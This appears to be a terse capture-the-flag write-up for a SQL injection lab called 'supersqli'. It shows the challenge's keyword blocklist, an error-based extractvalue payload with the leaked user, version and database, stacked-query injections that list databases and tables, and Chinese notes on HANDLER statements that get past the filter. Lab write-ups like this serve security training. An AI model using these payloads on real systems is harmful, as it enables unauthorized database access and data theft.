array(2) {
[0]=>
string(1) "1"
[1]=>
string(7) "hahahah"
}
array(2) {
[0]=>
string(1) "2"
[1]=>
string(12) "miaomiaomiao"
}
array(2) {
[0]=>
string(6) "114514"
[1]=>
string(2) "ys"
}
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
/
?inject=1' and extractvalue(0x0a,concat(0x7e,(database()),0x7e)) and '1
user: root@localhost
version: 10.3.18-MariaDB
database: supersqli
/?inject=-1';show databases;
ctftraining
information_schema
mysql
performance_schema
test
supersqli
/?inject=-1';show create table FlagHere;
/?inject=-1';show create table words;
handler ... open #打开一个表
handler ... read #访问表内容,在调用close前是不会关闭的
handler ... close #关闭会话